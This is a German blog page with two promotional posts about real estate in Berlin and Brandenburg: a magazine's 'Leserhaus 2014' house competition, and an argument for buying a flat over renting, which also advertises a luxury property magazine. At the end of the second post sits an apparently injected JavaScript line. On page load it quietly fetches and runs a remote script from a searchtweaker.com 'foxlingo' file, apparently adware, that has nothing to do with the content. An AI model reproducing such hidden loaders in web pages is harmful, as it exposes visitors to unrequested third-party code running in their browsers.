* Startseite     * Über...     * Archiv     * Gästebuch     * Kontakt     * Abonnieren



* Letztes Feedback






Hausbau in Berlin und Brandenburg ist attraktiv: Wettbewerb zum Leserhaus 2014 stell

Berlin & Brandenburg: Die Stimmung zum Kaufen und Investieren ist in der Bundesrepublik so günstig wie seit sieben Jahren nicht mehr. Das unterstreicht der aktuelle Konsumklimaindex des Institutes für Marktforschung GfK. Besonders begehrt blieben Reisen sowie  Immobilien. Die Finanzkrise scheint damit allmählig überwunden zu sein und neuer wirtschaftlicher Auftrieb macht sich vor allem in der Geldbörse deutlich bemerkbar. Viele Menschen legen dabei lieber ihr Geld in Sachwerte an, anstatt es zu sparen. Grund dafür sind auch die nach wie vor günstigen Zinswerte für Sparguthaben. Zwar wird außerdem das Sparkonto für wenig Menschen wieder lohnenswerter, aufgrund der vergangenen Finanzkrise und den anhaltend niedrigen Zinsen scheint das Misstrauen aber klar zu überwiegen.

Dagegen sehen viele Menschen Wohneigentum als sehr gute Alternative zum Sparen in wirtschaftlich unsicheren Zeiten. Die persönlichen 4 Wände offerieren nicht allein Freiheit von ansteigenden Mieten und erfüllen außerdem den Traum vom persönlichen sowie individuellen Wohnens, sie stellen auch einen verlässlichen Sachwert dar. Dies gilt insbesondere hinsichtlich des Hausbau in Berlin und Brandenburg.

Großes Angebot für den Hausbau in Berlin sowie Brandenburg


Es verblüfft nicht, dass in dieser Gegend Immobilien immer interessanter werden. Besonders im Umland der Bundeshauptstadt, dem sogenannten Berliner „Speckgürtel”, gibt es nach wie vor preiswerten Baugrund zu entdecken. Dank bemerkenswert geringer Zinsen für Baudarlehen und lohnenswerten Konditionen zur Finanzierung sollte sich der Traum von der individuellen Immobilie einfacher umsetzen lassen als noch ein paar Jahre zuvor. Immobilieneigentum in Brandenburg und im Berliner Umland erlaubt es, sich einen naturbelassenen Raum zum Rückzug fernab vom schnellen Puls Berlins zu schaffen, ohne notwendigerweise auf eine gute Verkehrsanbindung in die Spreemetropole verzichten zu müssen.

Abgesehen von vielen schönen Grundstücken ist zudem das Angebot an Haustypen für Hausbau in Berlin und Brandenburg umfangreich. Die Ausführungen reichen vom Massivhaus oder zum Beispiel Fertighaus bis hin zu einem Holzhaus. Um dem angehenden Hausbauer die Wahl zu vereinfachen und darüber hinaus einen 1. Einblick zu ermöglichen, hat die Zeitschrift Regionales Immobilien Journal Berlin & Brandenburg  zum zwölften Mal den Wettbewerb zum Leserhaus 2014   ausgeschrieben. Zur Auswahl stehen alles in allem 26 Haustypen verschiedener Anbieter für  Hausbau in Berlin sowie Brandenburg. Jeder  Leser kann den persönlichen Favoriten küren. Die Beteiligung an der großen Wahl zum Leserhaus 2014 rentiert sich: Unter jedem Teilnehmer verlost das Journal je dreimal eine exklusive Uhr von Jacques Lemans. Hinzu kommt: Die ersten 25 Einsender bekommen darüber hinaus je die kommenden 3 Ausgaben von Regionales Immobilien Journal Berlin & Brandenburg kostenlos.

Damit zudem sämtliche Häuser eine faire Chance erhalten und die Nachfrage für den Markt für Hausbau in Berlin sowie Brandenburg realistisch abgebildet wird, wurde das Teilnehmerfeld in 2 Kategorien untergliedert. Unter der Kategorie „Komfort” gibt es Häuser bis 250.000 €, bei der Kategorie „Premium” gibt es Häuser ab 250.000 Euro Einkaufspreis. Auf diese Art können Die Teilnehmer des Wettbewerbs zum Leserhaus 2014 zudem Trends im Markt für Immobilien in Berlin und Brandenburg mit beeinflussen.

Der erste  Eindruck beziehungsweise ein günstig erscheinender Kostenpunkt sollten dabei keinesfalls ausschlaggebend sein. Maßgeblich hinsichtlich einer guten Wahl sind das Gesamtangebot zu dem jeweiligen Haustyp und das Verhältnis von Preis und Leistung. Zu bedenken sind unter anderem auch Ausstattung, Baustoffe, Architektonische Gestaltung, Grundriss, Wohnfläche, Größe des Hauses und energetische Effizienz. Entscheidend bleibt jedoch die Frage, ob Sie tatsächlich in diesem Haus lange Sicht leben wollen. Wer bereits sein Traumhaus vorplanen will, sollte sich persönlich vor Ort überzeugen. Viele der bei dem Leserhauswettbewerb 2014 teilnehmenden Hausbau Anbieter bieten Interessierten den Besuch der Musterhäuser an.

 Bei der Rubrik „Komforthäuser bis 250.000 Euro” ist unter anderem das avantgardistische „Contzen-Max-Haus” vom Anbieter Max-Haus aufgeführt. Es beeindruckt nicht allein durch die außergewöhnliche Architektur und die gehobene Fassade aus Lärchenholz mit Flachdach, sondern ebenfalls durch eine bunte Innen- sowie Außengestaltung. Bei der Planung konzentrierte sich Architekt Lars Contzen vor allem auf eine ökologisch verträgliche Bauweise und urbane Verkleidung. Zum Einsatz kam hierbei qualitativ hochwertiges Material, die Türen sowie Die Terrassen sind behinderten- und altersgerecht.Das „Contzen-Max-Haus” besitzt eine Wohnfläche von 179,15 qm und eine KfW-Effizienzhausklasse 70.

Weitere Angaben zu Haustypen und Anbietern finden Sie online auf der Seite des Wettbewerb zum Leserhaus 2014 oder in der März-Ausgabe von Regionales Immobilien Journal Berlin & Brandenburg http://www.immobilien-journal.de. Wer sich an  der Verlosung der Sachpreise beteiligen will, sollte ebenfalls die eigene Anschrift angeben.

Weitere Informationen zu Anbietern von Immobilien sowie dem Hausbau in Berlin und Brandenburg  enthält die aktuelle Ausgabe vom Regionalen Immobilien Journal Berlin und Brandenburg.

Das Regionale Immobilien Journal Berlin & Brandenburg gibt es in jeden gut sortierten Zeitschriftengeschäft und außerdem ebenfalls im Internet. Mehr Informationen finden Sie auf dem Portal für Immobilien und Hausbau in Berlin & Brandenburg www.immobilien-journal.de oder unter www.facebook.com/immobilienjournal .

Regionale Immobilien Verlagsgesellschaft mbH

Wilhelmstr. 4

14624 Dallgow-Döberitz

 
www.riv-media.de

Fabian Möbis


Tel.: 0 33 22 / 22 166

Fax: 0 33 22 / 24 45 88

kontakt@riv-media.de
 


Die Regionale Immobilien Verlagsgesellschaft ist seit 1996 der Herausgeber des Regionale Immobilien Journal Berlin & Brandenburg.

In dem jeden Monat veröffentlichten Anzeigenmagazin finden sich viele Immobilienangebote aus der Region Berlin & Brandenburg. Der Anzeigenteil wird durch viele empfehlenswerte redaktionelle Beiträge aus der regionalen Immobilienwirtschaft und zudem vielen Infos rund um den Hausbau ergänzt.

Wer aber lieber die zeitgenössische Informationssuche über das Internet bevorzugt, wird in unserem Portal unter www.immobilien-journal.de garantiert fündig. Auf diese Weise ist das Regionale Immobilien Journal Berlin & Brandenburg auch als Onlinemagazin zugänglich.

Zusätzlich erscheinen einmal im Jahr der Musterhausführer Berlin & Brandenburg sowie der Immobilien Ratgeber Berlin & Brandenburg.
3.5.14 20:58


Werbung


Die Mieten wachsen weiter: Eigentumswohnung in Berlin auf Dauer preiswertere Alternative

Wohneigentum ist einfacher bezahlbar, als viele Menschen meinen. Besonders bei vielen Familien unterscheidet sich oft die Monatsbelastung der Finanzierung des Eigenheims kaum von der Kaltmiete. Dies ergab eine aktuelle Analyse des Deutschen Sparkassen- und Giroverbandes (D S G V). Gegenstand der Untersuchung ist die erstmals vorgenommene Berechnung der Haushalts-Budgets von 55.000 Familien in der Bundesrepublik Deutschland.

Die Mietkosten verkörpern demnach in der Regel mit Abstand den größten Kostenpunkten, danach kommenVerkehrsmittel und Verpflegung. Die monatlichen Aufwendungen zur Kredittilgung beim Kauf eines Eigenheims unterschieden sich hierbei im Vergleich nur in sehr geringem Maße von den monatlichen Mietkosten, so die Autoren der Untersuchung. Die monetäre Anforderung je Monat bleibe im Fall von Wohneigentum über alle Lebensphasen konstant. Sofern die Tilgungsrate entsprechend dem jeweiligen Einkommen angepasst und auf lange Sicht gestreut werde, sei die Bezahlung der persönlichen vier Wände gut zu realisieren. Wohnungseigentum offeriert damit zudem für alle Einkommensklassen eine lohnenswerte Option gegenüber unsicheren, tendenziell steigenden Mieten.

Eigene Immobilie in der Hauptstadt bietet angemessene Alternative zu wachsenden Mietpreise


Insbesondere Berlins Wohnungsmieter sind mit der Lage gut bekannt: In der Hauptstadt stiegen die Neumieten zwischen 2007 und 2012 um rund 40 % an. Laut einer aktuellen Erhebung des Marktforschungsinstituts TNS Infratest müssen die Bürger der Bundeshauptstadt mit 38 % im Durchschnitt mehr von ihrem Haushalts Einkommen für Wohnkosten bezahlen als der Rest der Deutschland. Hier bleiben es gerade mal 34 Prozent.

Parallel zu den anziehenden Mieten steigt auch das Interesse an Wohneigentum . Kaufkräftige Investoren setzen auf Immobilieneigentum in der Hauptstadt. Das internationale Wirtschaftsprüfungs-Unternehmen „ PricewaterhouseCoopers International Limited  (PwC) fand heraus, dass Berlin nach der bayerischen Landeshauptstadt München den wohl attraktivsten Immobilienmarkt in Europa bietet. Damit rangiert die Spreemetropole noch vor Metropolen wie z. B. Paris sowie London. Auf lange Zeit wird zudem der Erwerb von Immobilien in der Hauptstadt jedoch teurer sein: Um den doppelten Haushalt 2014/2015 finanzieren zu können, hat nun der Berliner Senat entschieden, die Steuer für Grunderwerb auf 6 % zu erhöhen. Berlin liegt somit an der Spitze aller Bundesländer  . Allein Schleswig-Holstein fordert mit 6,5 % noch mehr Steuer für Grunderwerb. Anleger dürfen die zusätzlichen Kosten auf die Mietpreise anrechnen. In erster Linie private Eigentümer einer Wohnung in der Spreemetropole werden dadurch von der Preissteigerung betroffen sein. Die Steuer, die einmalig bei dem Erwerb eines Grundstücks eingefordert wird, soll nun zum 1.Januar 2014 in Kraft treten.

Zur Zeit sehr gute Bedingungen für die Traumimmobilie nicht verstreichen lassen!

Auch die Zinswerte für Baudarlehen, die sich lange Zeit auf dem historischen Tiefststand befunden hatten, steigen langsam wieder . Somit dürften zukünftig  Kredite für den Hausbau und die Immobilie in der Hauptstadt teurer werden. Wer jetzt schon an die eigenen vier Wände in der Hauptstadt denkt, darf seinen persönlichen Traum deshalb nicht lange warten lassen.

Einen kreativen Einblick und viel Interessantes zu schönen Wohnungseigentum in der Hauptstadt bietet die Juli-Ausgabe von Exklusiv ‒ Immobilien in Berlin exklusiv-immobilien-berlin.de/ der Regionalen Immobilien Verlagsgesellschaft mbH . Zusätzlich zu den neuesten Wohnhighlights Berlins präsentiert die Redaktion unter anderem ebenso gehobene Bauensembles, Top-Lagen sowie darüber hinaus Konzepte für eine edle Inneneinrichtung . Besondere Wohnungsprojekte in Berlin werden detailliert erklärt und umfassend durch Bildstrecken veranschaulicht. Zu jeder Ausgabe des Magazins wird aus der Menge an anspruchsvollen Berliner Wohnimmobilien eine „Immobilie des Monats“ ausgesucht. Aber der exklusiven Leserschaft werden nicht nur  Immobilien in Berlin, sondern ebenso auch zahlreiche nicht zu vernachlässigende Themen rund um das gehobene Wohneigentum in Berlin präsentiert.

Top-Lagen für Immobilien in Berlin


 Eine individuelle Rubrik zeigt edle Innenausstattung für die persönlichen vier Wände, zum Beispiel die schöne Küchenkollektion von Osterfield, geräumige XXL-Duschen oder Anregungen für das eigene Home Spa von Grohe. Wie in jeder Ausgaben lädt Exklusiv ‒ Immobilien in Berlin exklusiv-immobilien-berlin.de/ seine Leserschaft zu einem „Spaziergang durch die Stadt” ein. Diesesmal geht es in den Berliner jüngsten Bezirk, nämlich nach Friedrichshain-Kreuzberg. Über weiteren Top Gegenden Berlins wird am Beispiel aktueller Bauprojekte umfassend informiert.

 Eine neue Blüte erlebt gegenwärtig zum Beispiel der zu Lichtenberg gehörende Kiez Rummelsburg. Unter anderem angesichts der baldigen Vollendung des Fernbahnhofs Ostkreuz gewinnt der Kiez zunehmend an Anziehungskraft. Dank seiner zentralen Lage bietet Rummelsburg eine gute Verbindung in Richtung Berlin Mitte. Nichtsdestotrotz müssen Anwohner nicht auf Erholung verzichten: Die Spree mit der ruhigen Rummelsburger Bucht und die Halbinsel Stralau befinden sich letztendlich nur einen Katzensprung entfernt. Anfang Mai wurde in Rummelsburg offiziell das Fundament für das Bau-Projekt „(G)lück 74” gelegt. In der Lückstraße, in der Nähe des Nöldnerplatzes, entstehen verhältnismäßig preisgünstige sowie zugleich gehobene Wohneigentum. Das Angebot reicht vom schicken 59 Quadratmeter-Innenstadt-Apartment bis zur 150 M² umfassenden Familienwohnung. Interessierte können aus insgesamt 26 Grundrissen wählen.

Detallierte Informationen zu diesen und anderen Wohn-Projekten und Top-Lagen in der Hauptstadt enthält die 3. Ausgabe des Magazins Exklusiv ‒ Immobilien in Berlin exklusiv-immobilien-berlin.de/ vom Juli/August 2013. Dazu kommen zudem Infos zu den verschiedenen rechtlichen Aspekten, architektonischen Höhepunkten, Berliner Bezirken, der perfekten Innenausstattung ebenso wie aktuellen Wohntrends.

Das Magazin erscheint aller zwei Monate, sie enthält viele fachkundige, fundierte Beiträge von markterfahrenen Immobilienprofis, verschiedenen Hausbau-Unternehmern, Architekten sowie Bauanwälten aus der Hauptstadt.

Exklusiv - Immobilien in Berlin gibt es im gut sortierten Zeitschriftenhandel und darüber hinaus auch im Internet. Mehr Informationen finden Sie auf exklusiv-immobilien-berlin.de/ .
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
12.9.13 16:37





Verantwortlich für die Inhalte ist der Autor. Dein kostenloses Blog bei myblog.de! Datenschutzerklärung
Werbung